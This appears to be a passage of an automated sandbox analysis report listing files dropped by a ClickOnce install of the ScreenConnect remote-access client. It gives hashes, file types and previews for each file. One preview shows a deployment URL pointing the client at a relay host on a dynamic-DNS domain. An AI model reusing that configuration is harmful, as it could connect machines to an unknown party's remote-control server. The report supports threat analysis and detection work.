                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                        Size (bytes):1662
                                                                                                                                                                                                                                                        Entropy (8bit):5.368796786510097
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                                                                        MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                                                                        SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                                                                                                                                                        SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                                                                        SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):847
                                                                                                                                                                                                                                                        Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                                        MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                                        SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                                        SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                                        SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (620), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):14980
                                                                                                                                                                                                                                                        Entropy (8bit):3.817098199869787
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:t6BKasdrv5yInMSiY7bBBaOy0lCsdrv5yInMSiY+g3+/Z8ZkgGsdrv5yInMSiY/Y:D5y8V7baQ5y8VnuO5y8V5JLEv
                                                                                                                                                                                                                                                        MD5:DC38212BE898C70A42355CCFE35BF1D0
                                                                                                                                                                                                                                                        SHA1:554F38DE323D7ACA5A02A1C0449551C9ADE5D8D5
                                                                                                                                                                                                                                                        SHA-256:2EC80884FB15E5413E1B117326FE1A4EF11978AB838AD47C2BAA22FB0B9D34C6
                                                                                                                                                                                                                                                        SHA-512:A56E4A20D773841464B0C8D55BCD5592A6E72BCBAF76C7D90D8EEAED58EBC1259D77904E122EF1D10F724BEC544BE0716C7511E752DCC1E2781E24C403B319FF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.s.e.c.u.r.e...s.t.a.n.s.u.p...c.o.m./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.k.j.h.2.3.1.a...z.a.p.t.o...o.r.g.&.p.=.8.0.4.1.&.s.=.a.e.0.9.5.c.2.3.-.8.e.2.2.-.4.7.4.7.-.b.9.a.
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):197120
                                                                                                                                                                                                                                                        Entropy (8bit):6.584712994459805
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:mxGtNaldxI5KY9h12MMusqVFJRJcyzvfquFzDvJXYyB:1tNalc5fr12MbPJY8quFGy
                                                                                                                                                                                                                                                        MD5:4D94014D41DE954AEE952C1B930BA395
                                                                                                                                                                                                                                                        SHA1:35A776D4B569C5367F61A68A577CE92086E682E2
                                                                                                                                                                                                                                                        SHA-256:AD8FC048CE7A61C1AF0428B7B3989163A215A9378417CAC6FBF232D0538405C3
                                                                                                                                                                                                                                                        SHA-512:0ACA355B24FAF86B6C321E88321EFF542F277331745010C3A495AAE6F2F123E518284CB7445F78A83BCE3A61BDFFD1AA3FC082E7DC854218B5D7AF95478414F8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1039
                                                                                                                                                                                                                                                        Entropy (8bit):5.154101033983839
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AJR7vNxW57FpS+iENg49vNxW5NgMCNg49vNxWO:JdFYZ8h9onRigeP0AKvSkcyMwcVSkTo
                                                                                                                                                                                                                                                        MD5:CD5FD6DC905D01654E81EAD73F6CE116
                                                                                                                                                                                                                                                        SHA1:9A3ED5183F323F33C37755B90B45D401D45AC46C
                                                                                                                                                                                                                                                        SHA-256:51F959457A28D492E123B6B2982865716E8A811CF43DE856033C24CE34C0B187
                                                                                                                                                                                                                                                        SHA-512:25CA0DBBC602C6B61ACA7DA840A2353FD8C5C7FB3B311544DDCC3B1936B3A0F72A93D32E38093AB8B30935211EB4D260EC766EA5C9FBD90D50740EACA54BC052
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):68096
                                                                                                                                                                                                                                                        Entropy (8bit):6.069003835678311
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:vA0ZscQ5V6TsQqoSDih6+39QFVIl1LJhb8gF:o0Zy3IUOQFVQLJF
                                                                                                                                                                                                                                                        MD5:47C0BF8CC60128C530A930637822EA78
                                                                                                                                                                                                                                                        SHA1:6FBAF1C36AF7DFCA4B4970A9F71C1DCD8B7A57F9
                                                                                                                                                                                                                                                        SHA-256:EA71F7DCBE7E754EEF4ED40A931EDA12FEF7063B173A5B1D5095F683B254504C
                                                                                                                                                                                                                                                        SHA-512:D2CBF3BCC53D0D340984617867F22CB43CE5A336B7B844E2F339B308FF28C955F5F3C7217C5ECDFE509B45DBD519BD733C3C9B9C6B8ABA945B8E6A288B495B17
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1632
                                                                                                                                                                                                                                                        Entropy (8bit):5.092740375848212
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRzgeP0AW+vSkcyMwcbEMwcuMwcVSkcf5bdTo:3FYZ8h9o9gI0AWCHMwTMw3MwGAXTo
                                                                                                                                                                                                                                                        MD5:219DBCD947D7BBDF0BBC78778286B8C7
                                                                                                                                                                                                                                                        SHA1:E95D66F48C130644CE421CBBBFCF3D376FEBAC4E
                                                                                                                                                                                                                                                        SHA-256:C92BB401516771F702CD0986219589CA90E7DE089C8CF4DD825D904985299796
                                                                                                                                                                                                                                                        SHA-512:9E147F80D629AA00C4E0CB8DB708635BA6C14FDE30B8A5574927197352747B43B063060EB4D201C2B4AC984A9F4C84F5F774EB29DE481A0FEE572FB7B0C31F13
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):95520
                                                                                                                                                                                                                                                        Entropy (8bit):6.504144260093153
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Sg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMu7axl:jhbNDxZGXfdHrX7rAc6myJkgoU0HVI
                                                                                                                                                                                                                                                        MD5:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                        SHA1:15886A7D4385D7EC4F7C8837D7218D46E5B3DD9C
                                                                                                                                                                                                                                                        SHA-256:0B2824097ABE3211AAC5FEDA8DC4D300BA51801D9FBED9EB8330B433A66AC001
                                                                                                                                                                                                                                                        SHA-512:B9133EA853AAF6BB2F5EFD7B65A4559701C37D992D8E9CC79BF181CD8CECF0D436077278DDD87725FB5E59BB2962D0FBC111BF0C7E1C760688D01BA4FA4F003E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):548352
                                                                                                                                                                                                                                                        Entropy (8bit):6.045519732283216
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:YtkHq9BVYKH062PQHz0k4NbuI2Tt1QsEaVQQUzxmj8/lmQpnGGlsGdmACEhHkG5Y:YNpZZasEbJ0OnGGlNkuMHCzzdU
                                                                                                                                                                                                                                                        MD5:D0B5084C680C798B5340D2E61CA5E06C
                                                                                                                                                                                                                                                        SHA1:C4F4DE6B77589A8D853F565C99DEF5DBFB230725
                                                                                                                                                                                                                                                        SHA-256:D933498CD929C57AAB0C3AF908E0FE617213DD67C13E39B2A1D68B8F21849A7A
                                                                                                                                                                                                                                                        SHA-512:E14E32D981F4926FE80A4C45D5DFCDCDC3B78DC63556FFBFB4DCE61C2818E6AA2FD5BACC5734970BDE017AC3FDCF0E24FABCC68C1C99C98A84095394E46391B5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1215
                                                                                                                                                                                                                                                        Entropy (8bit):5.132426421892876
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0AqvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AmGVETDTo
                                                                                                                                                                                                                                                        MD5:7836CB4BB4AA3204BE8BCB1998653762
                                                                                                                                                                                                                                                        SHA1:555EBD513BB5C4EE073415FD71F24D0697038F6D
                                                                                                                                                                                                                                                        SHA-256:F1E8F85E0495160BBA92E1B89C8C5A1BE51E5F7CC289212CBBAF6FC6141B4076
                                                                                                                                                                                                                                                        SHA-512:B18CC8779DCF15AB7DA2604F4D48E53870FE84E22B1CEE34AF9CC9D9B5B7A0CC5AABF11CC08CADD137A8CAA86451326A770B5FAC727E84E9721206649E4AE7A7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1721856
                                                                                                                                                                                                                                                        Entropy (8bit):6.638253108372186
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24576:qGPFFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:DPFJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                        MD5:F4E602A8A0FD88FF3FFDAC946C21E567
                                                                                                                                                                                                                                                        SHA1:1B9D9F1581F780485A325A35DCD29A16B213591C
                                                                                                                                                                                                                                                        SHA-256:2AB4FB595844C11F27A54402C37197C96FA8E92FCC5D63B43D4810A4891EFBC7
                                                                                                                                                                                                                                                        SHA-512:6DFFC1EF67CC474FC7DCE358A7E3297EBAB4456B88A3A172F0E4BA65C5EE8DD6F67611296DBC8F478B7A3E2ED714E412A26BEF84D19E1B36AD0754BD693CF00B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1980
                                                                                                                                                                                                                                                        Entropy (8bit):5.059741759134869
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0AIvSkcyMwcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AEHMwGQAXRTFgTo
                                                                                                                                                                                                                                                        MD5:22FE4BC3BB143D14D2142E096955F9B7
                                                                                                                                                                                                                                                        SHA1:332597F5A4D2D3724DCFDA19AF7734846CEDF474
                                                                                                                                                                                                                                                        SHA-256:39D81BE76E978E5D6BF4DC5F74226E48FA4EA77780A6792CAB947C5D20D4A6AA
                                                                                                                                                                                                                                                        SHA-512:508660E83C75AD55A11CDDC6381547536A4CBB5A4A940D3D17F77AD256C9943360650750343FE32C86F6DC462273AEAE68E40903F2C33A0AD9F09D393FB1B59F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):61216
                                                                                                                                                                                                                                                        Entropy (8bit):6.311801757323114
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:EW/+lo6MOc8IoiKWj8Nv8DtyQ4RE+TC6GAhVby97sxd:ELlo6dcclCyQGGn9G
                                                                                                                                                                                                                                                        MD5:C754141304DE3EBAD8ECEEA033356AD6
                                                                                                                                                                                                                                                        SHA1:6AC5D18F1525878FA83E5A93F606AFC58DC7D949
                                                                                                                                                                                                                                                        SHA-256:B1B8A3AD61C1ECED612C442442CC2CF73E2E4B81ACFC8EDFDB3DDEEBAE1E6D78
                                                                                                                                                                                                                                                        SHA-512:81C3B134A2C7C591607ACAC6F9C7881BF0BC194903339534943D65DF49E904BC7FAEEA2A350A4314E28DB2C913C2183C9D3ECF6CA03EB082F5EA461D1E4A6333
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):600864
                                                                                                                                                                                                                                                        Entropy (8bit):6.181289241696816
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:CQjDnLlwtFNqDJPeQ66ON3nNFcndYYvavXP:Nmt7KLONdFCdYA+P
                                                                                                                                                                                                                                                        MD5:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                        SHA1:F288AE509BAE3A0901B727DEBE2CA3153AB77B72
                                                                                                                                                                                                                                                        SHA-256:054260618E077FADCD155C5F37EF3D5745F914ADFE916AE61E8BAFA47F855839
                                                                                                                                                                                                                                                        SHA-512:DC1BF1331B18D0C0E9092A57575A106DFC71CFAE5F9744D6ECACF1F65C3FF8B635737E6F380E7F166DE96E261E79A3C6459DB9D3C8BB524FB7A92DD940847728
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2569
                                                                                                                                                                                                                                                        Entropy (8bit):5.030098902772427
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AbHMwAXQ3MwTMwRGTDBTo:1YiW4AohvNo
                                                                                                                                                                                                                                                        MD5:F89D1C01400FCD12B5BB47E952ECBBCF
                                                                                                                                                                                                                                                        SHA1:D23F66FF01B2D06227208FFC88D0A923E99F565A
                                                                                                                                                                                                                                                        SHA-256:D540814FA7D487264D0167616D1EABDB78B4D4C0795B124452108CB14675DC26
